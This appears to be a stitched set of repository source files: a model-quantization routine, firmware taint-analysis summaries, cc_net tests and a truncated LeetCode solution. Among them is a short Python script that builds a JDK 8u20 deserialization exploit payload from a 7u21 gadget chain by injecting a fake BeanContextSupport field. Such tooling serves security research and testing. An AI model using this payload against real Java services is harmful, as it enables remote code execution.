logger.info('Quantization scope was not changed due to algo conditions: %s', self._change_conditions)
logger.update_progress(self.total_exec_steps)
return quantized_model
def _collect_baseline(self, model, print_progress):
logger.info('Start original model inference')
return self._evaluate_model(model=model,
print_progress=print_progress)
def _change_quantization_scope(self, model, original_accuracy_drop,
fully_quantized_metrics_per_sample):
"""Applies greedy search to remove fake-quantize nodes that degrade metric values
:param model: fully quantized model
:param original_accuracy_drop: dictionary of per-metric drops
of fully quantized model {metric_name: drop_value}
:param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values
of fully quantized model
:return model: model with new quantization scope
"""
self._quantized_layers_num = \
self._get_num_of_quantized_ops(model)
logger.info('The total number of quantized operations in the graph: %d', self._quantized_layers_num)
logger.info('Changing fake quantize nodes scope')
all_changed_nodes_names = []
all_ops_in_targeted_prec = set()
drop_functor = lambda a: (original_accuracy_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a]
metric_to_optimize = sorted(original_accuracy_drop.keys(), key=drop_functor)[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
# calculate importance of fq nodes
node_importance = self._get_node_importance(model,
metric_to_optimize,
fully_quantized_metrics_per_sample)
quantized_metrics_per_sample = None
reached_required_drop = False
changed_all_fq = False
is_step_back = True
iteration = 0
excluded_nodes = []
for iteration in range(self._config.max_iter_num):
# save model and metrics from previous iteration
model_prev_iter = deepcopy(model)
metrics_prev_iter = deepcopy(quantized_metrics_per_sample)
if not node_importance:
logger.info(
'All layers have been checked and the AccuracyAwareQuantization '
'will not be able to achieve the required accuracy drop')
changed_all_fq = True
break
# greedy removal of the FQ node with the highest importance score
fq_name_to_change = node_importance.pop(0)
model, changed_nodes, ops_in_targeted_prec = self._modify_model_in_scope(model,
[fq_name_to_change])
logger.debug('Changed a block of %d FQ layers: %s', len(changed_nodes), changed_nodes)
logger.info('Reverted %d layers to the %s precision: %s',
len(ops_in_targeted_prec), self._precision_change_to, ', '.join(ops_in_targeted_prec))
all_changed_nodes_names.append(str(changed_nodes))
all_ops_in_targeted_prec.update(ops_in_targeted_prec)
# save intermediate model
self._save_intermediate_model(model)
# calculate drop for new quantization scope
final_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=True)
metrics_accuracy_drop = {name: params.comparator(self._baseline_metric[name]
- final_metrics[name])
for name, params in self._metrics_config.items()}
new_accuracy_drop = metrics_accuracy_drop[metric_to_optimize]
logger.info('Accuracy drop with the new quantization scope is %s', metrics_accuracy_drop)
# removed all fake-quantize layers from the model
if not get_nodes_by_type(model, ['FakeQuantize']):
logger.info('Removed all FQ layers from the network!')
changed_all_fq = True
break
# all drop restrictions are met
if self._drop_restrictions_are_met(metrics_accuracy_drop):
reached_required_drop = True
break
# continue greedy fq removal
if self._max_drop_by_name[metric_to_optimize] < new_accuracy_drop <= accuracy_drop \
or (new_accuracy_drop > accuracy_drop and is_step_back):
is_step_back = False
accuracy_drop = new_accuracy_drop
continue
# if after fq removal drop has increased
# calculate node importance of the model (from previous iteration)
if new_accuracy_drop > accuracy_drop and self._config.use_prev_if_drop_increase:
model = model_prev_iter
quantized_metrics_per_sample = metrics_prev_iter
all_changed_nodes_names.remove(str(changed_nodes))
all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)
if self._exclude_bad_nodes:
excluded_nodes.extend(changed_nodes)
logger.debug('%s added to excluded list: %s', str(changed_nodes), str(excluded_nodes))
is_step_back = True
accuracy_drop = new_accuracy_drop
# if drop restriction for the current metric is satisfied, select the next metric
# and calculate node importance
if new_accuracy_drop <= self._max_drop_by_name[metric_to_optimize]:
metric_to_optimize = sorted(original_accuracy_drop.keys(),
key=lambda a, current_drop=metrics_accuracy_drop:
(current_drop[a] - self._max_drop_by_name[a]) /
self._baseline_metric[a])[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
is_step_back = False
del model_prev_iter, metrics_prev_iter
logger.info('Re-calculating node importance')
node_importance = self._get_node_importance(model,
metric_to_optimize,
quantized_metrics_per_sample,
excluded_nodes)
if changed_all_fq or not reached_required_drop:
# Do not remove or change!
logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.',
force=True)
if iteration + 1 >= self._config.max_iter_num:
logger.info('Reached maximum number of iterations.')
if not changed_all_fq:
logger.debug('Changed FakeQuantize nodes:\n %s', '\n'.join(all_changed_nodes_names))
logger.info(' %d out of %d layers have been reverted back to the %s precision: %s',
len(all_ops_in_targeted_prec), self._quantized_layers_num, self._precision_change_to,
', '.join(all_ops_in_targeted_prec))
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, len(all_ops_in_targeted_prec)))
logger.update_progress(self.total_exec_steps)
return model
def _get_node_importance(self, model, metric_name, qmodel_per_sample_metrics=None, excluded_nodes=None):
"""Creates a list of fake-quantize nodes importance in descending order
based on their contribution to metric degradation
:param model: model with fake-quantize nodes
:param metric_name: metric to be taken into consideration
:param qmodel_per_sample_metrics: per-sample metrics values of quantized model
:return list of node names
"""
if qmodel_per_sample_metrics is None:
# get quantized model predictions
_, qmodel_per_sample_metrics = self._evaluate_model(model=model,
subset_indices=self._diff_subset_indices)
ranking_subset = self._get_ranking_subset(qmodel_per_sample_metrics, metric_name) # not sorted
node_importance_score = self._calculate_node_importance_scores(model,
ranking_subset,
metric_name,
excluded_nodes)
# sort by error value and then by node name
node_importance = sorted(node_importance_score.items(), key=lambda x: (x[1], x[0]), reverse=True)
node_importance = [n[0] for n in node_importance]
return node_importance
def _get_ranking_subset(self, qmodel_per_sample_metrics, metric_name, from_id=0):
"""Determines samples on which the quantized model predicts worse than on the original model
:param qmodel_per_sample_metrics: per-sample metrics values of the quantized model
:param metric_name: metric to take into account
:return a list of image ids
"""
persample_metric = self._metrics_config[metric_name].persample
sorted_sample_importance = \
persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name],
qmodel_per_sample_metrics[persample_metric.name],
reverse=True)
to_id = from_id + self._config.ranking_subset_size
ranking_subset = \
np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]
return ranking_subset
def _calculate_node_importance_scores(self, model, ranking_subset, metric_name, excluded_nodes=None):
"""Cuts out FQ layers one after another and measures metric value on ranking subset.
The higher the value, the more important the node.
:param model: graph from which to cut nodes
:param ranking_subset: subset on which the scores will be calculated
:param metric_name: metric to take into account
:return a dictionary of node importance {metric_name: score}
"""
change_fqs = []
node_importance_score = {}
eu.select_evaluation_dataset(self._engine)
fake_quantize_nodes = get_nodes_by_type(model, ['FakeQuantize'])
for node in fake_quantize_nodes:
if excluded_nodes and node.name in excluded_nodes:
continue
if node.name not in change_fqs:
modified_model, modified_fq_layers, _ = self._modify_model_in_scope(deepcopy(model), [node.name])
if not modified_fq_layers:
continue
logger.debug('Changed\\Removed a block of %d FQ layers: %s', len(modified_fq_layers),
modified_fq_layers)
change_fqs += modified_fq_layers
self._engine.set_model(modified_model)
self._engine.allow_pairwise_subset = True
index_sampler = create_sampler(self._engine, samples=list(ranking_subset))
metrics, *_ = self._engine.predict(sampler=index_sampler)
self._engine.allow_pairwise_subset = False
logger.update_progress(self._config.ranking_subset_size)
ranking_metric = self._metrics_config[metric_name].ranking
node_importance_score[node.name] = ranking_metric.comparator(metrics[ranking_metric.name])
eu.reset_dataset_to_default(self._engine)
return node_importance_score
def _modify_model_in_scope(self, model, nodes_names):
return self._graph_transformer.remove_fq_nodes(deepcopy(model), nodes_names)
def compute_total_exec_steps(self, model=None):
total_steps = 0
        # add dataset_size to total if the baseline metric still has to be collected
if not self._baseline_metric or self._config.annotation_free:
total_steps += self._dataset_size
# add dataset_size to total for int8 inference
total_steps += self._dataset_size
# add dataset_size to total in case of conversion to mixed mode
if self._config.convert_to_mixed_preset:
total_steps += self._dataset_size
nodes_length = len(get_nodes_by_type(model, ['Convolution', 'MatMul']))
num_steps = self._config['max_iter_num'] if self._config['max_iter_num'] < maxsize else nodes_length
metric_computing_steps = nodes_length * self._config['ranking_subset_size']
# add ranking_subset_size for num_steps and again computing every 3 steps
total_steps += metric_computing_steps + \
metric_computing_steps * self._config['ranking_subset_size'] * num_steps / 3
# add total run steps (num steps) without one of FQs pairs
total_steps += num_steps * self._dataset_size
# number of statistics computing
total_steps += self._quantization_algo.total_exec_steps
if self._config.convert_to_mixed_preset:
total_steps += self._preset_conversion_algo.total_exec_steps
self.total_exec_steps = total_steps
def _convert_model_to_mixed_preset(self, model):
logger.info('Start quantization in mixed mode')
return self._preset_conversion_algo.run(model)
def _quantize_model(self, model):
logger.info('Start quantization')
return self._quantization_algo.run(model)
def _search_optimal_parameters(self, model):
logger.info('Start parameters grid search')
return self._grid_search_algo.run(model)
def _quantize_and_evaluate(self, model, quantization_algo, print_progress=True):
def calculate_accuracy_drop():
return {metric_name: params.comparator(self._baseline_metric[metric_name]
- quantized_metrics[metric_name])
for metric_name, params in self._metrics_config.items()}
quantized_model = quantization_algo(model)
logger.info('Start compressed model inference')
quantized_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=quantized_model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=print_progress)
logger.info('Fully quantized metrics: %s', quantized_metrics)
metrics_accuracy_drop = calculate_accuracy_drop()
logger.info('Accuracy drop: %s', metrics_accuracy_drop)
return quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample
def _drop_restrictions_are_met(self, metrics_accuracy_drop):
return all(metrics_accuracy_drop[name] <= self._max_drop_by_name[name]
for name in self._metrics_config)
def _save_intermediate_model(self, model):
save_model(model,
self._config.intermediate_log_dir,
model_name='intermediate_model')
logger.debug('Intermediate model is saved in %s', self._config.intermediate_log_dir)
def _create_hardest_ranking_subset(self, metrics_per_sample):
worst_ranking_subset = []
while len(worst_ranking_subset) < self._config.ranking_subset_size:
needed_subset_size = self._config.ranking_subset_size - len(worst_ranking_subset)
top_n_samples = int(np.ceil(needed_subset_size / len(metrics_per_sample.keys())))
local_ranking_subset = []
for metric_name in metrics_per_sample:
ranking_subset = self._get_ranking_subset(metrics_per_sample, metric_name, len(worst_ranking_subset))
local_ranking_subset.extend(ranking_subset[:top_n_samples])
worst_ranking_subset.extend(list(set(local_ranking_subset)))
return list(set(worst_ranking_subset))
def _evaluate_model(self, model, per_sample_subset_indices=None,
subset_indices=None, print_progress=True):
metrics, metrics_per_sample = evaluate_model(model, self._engine, self._dataset_size,
subset_indices, print_progress, self._metrics_config,
per_sample_subset_indices, self._output_node_name,
self._stats_layout)
predict_step_size = self._dataset_size if not subset_indices else len(subset_indices)
logger.update_progress(predict_step_size)
return metrics, metrics_per_sample
def _request_alt_statistics(self, model):
pass
def _get_num_of_quantized_ops(self, model):
return get_num_of_quantized_ops(model, self._graph_transformer.fq_removal.quantize_operations)
@staticmethod
def _get_result_aa(metrics_accuracy_drop, num_of_reverted_layers):
try:
return str({'final_drop': dict(metrics_accuracy_drop),
'num_of_reverted_layers': num_of_reverted_layers})
except Exception as e: # pylint: disable=broad-except
logger.info("Error occurred while trying to send telemetry. Details:" + str(e))
return str(None)
@staticmethod
def _create_quantization_algo(algo_config, name, engine):
algo = COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config, engine)
algo.name = name
return algo
|
tests/test8u20/main.py | potats0/javaSerializationTools | 124 | 30356 | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
    # Step 1: add a fake field named "fake" to the HashSet
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
    # Build a fake BeanContextSupport deserialization object; note that it must reference the AnnotationInvocationHandler below
    # Read the class description of BeanContextSupportClass
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
    # Add the beanContextChildPeer field to beanContextSupportObject
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
    # Add the serializable field to beanContextSupportObject
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
    # Add objectAnnotation data to beanContextSupportObject
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
    # Put the beanContextSupportObject into the fake field
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
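    # Optional sanity check (illustrative only; assumes the generated stream can be re-read
    # with the same reader API used at the top of this script):
    # with open("8u20.ser", "rb") as f2:
    #     ObjectRead(f2).readContent()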
|
tool/taint_analysis/summary_functions.py | cpbscholten/karonte | 294 | 30401 | """
Though karonte relies on angr's sim procedures, these sometimes add constraints to the current state to make the
analysis faster. For example, if a malloc has an unconstrained size, angr adds the constraint
size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes it impossible to reason about the
maximum buffer sizes (as needed by karonte).
In this module we wrap sim procedures to prevent them from adding such constraints.
Note, however, that the semantics of an expression might get lost.
E.g., strlen(taint_x) = taint_y, where taint_y is an unconstrained variable.
"""
from taint_analysis.coretaint import *
def _get_function_name(addr, p):
"""
Return a function name
:param addr: function address
:param p: angr project
:return: function name
"""
return p.loader.find_plt_stub_name(addr)
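# Illustrative sketch only (not part of the original module): summaries defined below are
# typically selected by the callee's PLT stub name, e.g.:
#   SUMMARIES = {'memcmp': memcmp_sized, 'strcmp': memcmp_unsized,
#                'memcpy': memcpy_sized, 'strcpy': memcpy_unsized}
#   name = _get_function_name(callee_addr, p)
#   if name in SUMMARIES:
#       SUMMARIES[name](core_taint, call_site_path, plt_path)
# (core_taint, callee_addr, call_site_path, and plt_path are placeholder names for this sketch.)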
def source_dummy(*_, **__):
pass
def memcmp_unsized(_core, _, plt_path):
"""
memcmp-like unsized (e.g., strlen) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcmp_sized(_core, _, plt_path):
"""
memcmp-like sized (e.g., memcmp) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
reg_n = arg_reg_name(p, 2)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
n = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, reg_n))
# we untaint buffers only if n is not tainted
if not _core.is_tainted(n, plt_path):
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcpy_sized(_core, call_site_path, plt_path):
"""
memcpy-like sized (e.g., memcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
# if the second parameter is tainted (or pointing to a tainted location)
# or the third is tainted, we taint the first too
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
dst_loaded = _core.safe_load(plt_path, dst)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
reg_n = arg_reg_name(p, 2)
n = getattr(plt_path.active[0].regs, reg_n)
# n_loaded = _core.safe_load(plt_path_cp, size)
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
# TODO take N into account
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
# untaint if the size is constrained
if (_core.is_tainted(dst, path=plt_path) or
_core.is_tainted(dst_loaded, path=plt_path)) and \
not _core.is_tainted(n, path=plt_path):
# do untaint
_core.do_recursive_untaint(dst_loaded, plt_path)
def memcpy_unsized(_core, call_site_path, plt_path):
"""
    memcpy-like unsized (e.g., strcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
# dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
# run the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
def is_size_taint(v):
return '__size__' in str(v)
def sizeof(_core, call_site_path, plt_path):
"""
sizeof-like (e.g., strlen) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
n = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
    cnt = _core.safe_load(plt_path, n, _core.taint_buf_size // 8)  # size in bytes must be an integer
# use the sim procedure to continue to the next state and add constraints
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "sizeof: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
return_value = getattr(plt_path.active[0].regs, ret_reg_name(p))
# TODO: check if the constraints set by angr sim procedure are correct
# if there is a tainted buffer in one of the registers then also taint this variable
if _core.is_tainted(cnt, path=plt_path) or _core.is_tainted(n, path=plt_path):
t = _core.get_sym_val(name=(_core.taint_buf + '__size__'), bits=p.arch.bits).reversed
_core.add_taint_glob_dep(t, cnt, plt_path)
# constrain output of this variable equal to the output of sizeof and add it to the return register
plt_path.active[0].add_constraints(return_value == t)
setattr(plt_path.active[0].regs, ret_reg_name(p), t)
#
# Heap functions
#
def _malloc(_core, _, plt_path):
"""
    malloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "malloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def _realloc(_core, _, plt_path):
"""
realloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 1))
# ptr = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
        setattr(state.regs, arg_reg_name(p, 1), size)  # realloc's size is its second argument
# if the size is not tainted, use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "realloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def heap_alloc(_core, call_site_path, plt_path):
"""
Heap allocation function stub
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
sim_size = None
if fname == 'malloc':
sim_size = _malloc(_core, call_site_path, plt_path)
elif fname == 'realloc':
sim_size = _realloc(_core, call_site_path, plt_path)
else:
print(f"Implement this heap alloc: {fname}")
if sim_size is not None:
taint_args = [l for l in sim_size.recursive_leaf_asts if _core.is_tainted(l, call_site_path)]
if taint_args and len(set(taint_args)) == 1:
arg = taint_args[0]
if is_size_taint(arg):
_core.do_recursive_untaint(arg, plt_path)
#
# Env function
#
env_var = {}
def _setenv(_core, _, plt_path):
"""
setenv function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
# add the environment variable to the list of env_variables with this key
key = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
env_var[str(key)] = getattr(plt_path.active[0].regs, arg_reg_name(p, 1))
# this call can continue with an empty sim procedure since it does nothing
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
def _getenv(_core, call_site_addr, plt_path):
"""
getenv function summary
:param _core: core taint engine
:param call_site_addr: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
env_var_size = _core.taint_buf_size
reg = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt_mem = _core.safe_load(plt_path, reg)
key = str(reg)
# this info is passed by some user controllable source
if _core.is_tainted(reg, path=plt_path) or _core.is_tainted(cnt_mem, path=plt_path):
to_store = _core.get_sym_val(name=_core.taint_buf, bits=env_var_size)
# it was set before
elif key in env_var:
to_store = env_var[key]
# fresh symbolic var
else:
to_store = _core.get_sym_val(name="env_var", bits=env_var_size)
# store the symbolic buffer at the memory address
addr = plt_path.active[0].heap.allocate(env_var_size)
plt_path.active[0].memory.store(addr, to_store)
# use an empty hook as sim procedure to continue with the program
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
# set the return address to the pointer
setattr(plt_path.active[0].regs, ret_reg_name(p), addr)
def env(_core, call_site_path, plt_path):
"""
Summarize environment functions (getenv, and setenv)
    :param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return:
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
if fname == 'setenv':
_setenv(_core, call_site_path, plt_path)
elif fname == 'getenv':
_getenv(_core, call_site_path, plt_path)
else:
print(f"Implement this Env function: {fname}")
# return the env_var if tainted to store for bug_finders
#
# Numerical
#
def atoi(_core, _, plt_path):
p = _core.p
state = plt_path.active[0]
val = getattr(state.regs, arg_reg_name(p, 0))
if _core.is_or_points_to_tainted_data(val, plt_path):
addr = plt_path.active[0].memory.load(val, p.arch.bytes)
_core.do_recursive_untaint(addr, plt_path)
plt_path.step().step()
|
kenlm_training/tests/test_minify.py | ruinunca/data_tooling | 435 | 30404 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
sentences = ["Hello world !", "Is everyone happy in here ?"]
hashes = get_hashes(sentences)
assert all([len(h) == HASH_SIZE for h in hashes])
hashes_int = [minify._b2i(h) for h in hashes]
encoded = encode_hashes(hashes)
decoded = decode_hashes(encoded)
assert all([len(d) == HASH_SIZE for d in decoded])
decoded_int = [minify._b2i(d) for d in decoded]
assert hashes_int == decoded_int
assert hashes == decoded
def test_minify():
doc = {
"raw_content": "Hello world !\nIs everyone happy in here ?",
"language": "en",
"perplexity": 120.0,
"line_ids": [0, 4],
}
expected = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
minifier = minify.Minifier()
assert expected == minifier(doc)
@pytest.fixture
def http_from_disk(monkeypatch):
def read_sample_file(url: str, n_retry: int = 3) -> bytes:
expected_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
assert expected_url == url
file = Path(__file__).parent / "data" / "sample.warc.txt"
return file.read_bytes()
monkeypatch.setattr(cc_net.jsonql, "request_get_content", read_sample_file)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
# We don't need no education.
chosen_quotes = "\n".join(
l for l in full_quotes.splitlines() if "Education" not in l
)
cc_doc = {
"url": "http://sample_english.com",
"date_download": "2019-03-18T00:00:00Z",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"source_domain": "sample_english.com",
"title": "Famous Mark Twain Quotes",
"raw_content": full_quotes,
"cc_segment": "crawl-data/sample.warc.wet",
"nlines": 4,
"length": 353,
}
ccnet_metadata = {
"language": "en",
"language_score": 0.99,
"perplexity": 151.5,
"bucket": "head",
"raw_content": chosen_quotes,
"nlines": 3,
"length": len(chosen_quotes),
"original_nlines": 4,
"original_length": 353,
"line_ids": [0, 2, 3],
}
ccnet_doc = dict(cc_doc, **ccnet_metadata)
mini = minify.Minifier()(ccnet_doc.copy())
assert mini is not ccnet_doc
important_fields = [
"url",
"digest",
"cc_segment",
"language",
"language_score",
"perplexity",
"bucket",
"line_ids",
]
expected = {k: ccnet_doc[k] for k in important_fields}
expected["line_ids"] = encode_line_ids(expected["line_ids"]) # type: ignore
assert expected == mini
with jsonql.open_write(tmp_path / "sample.json") as o:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
# line_ids is removed when unminifying
ccnet_doc.pop("line_ids")
assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
mini_docs = [
{
"url": "http://sample_chinese.com",
"digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([2]),
"bucket": "not_that_great",
},
{
"url": "http://sample_english.com",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([3]),
"bucket": "top_notch",
},
]
with jsonql.open_write(tmp_path / "sample.json") as o:
for mini in mini_docs:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
docs = [d for d in fetcher.map(cc) if d is not None]
assert cc.retrieved_segments == 1
# Note: documents are retrieved as they are ordered in the .warc.wet file
assert [
"Facts are stubborn things, but statistics are more pliable.",
"事實是固執的東西,但統計數字卻比較柔和。",
] == [d["raw_content"] for d in docs]
assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
|
python/091-100/Interleaving String.py | KaiyuWei/leetcode | 150 | 30416 | <reponame>KaiyuWei/leetcode<filename>python/091-100/Interleaving String.py
class Solution:
# @param {string} s1
# @param {string} s2
# @param {string} s3
# @return {boolean}
def isInterleave(self, s1, s2, s3):
m = len(s1)
n = len(s2)
if m+n != len(s3):
return False
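        # table[i][j] is True when s3[:i+j] is an interleaving of s1[:j] and s2[:i].
        # Illustrative examples (not part of the original submission):
        #   isInterleave("aabcc", "dbbca", "aadbbcbcac") -> True
        #   isInterleave("aabcc", "dbbca", "aadbbbaccc") -> False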
table = [([False] * (m+1)) for i in range(n+1)]
table[0][0] = True
for i in range (1, m+1):
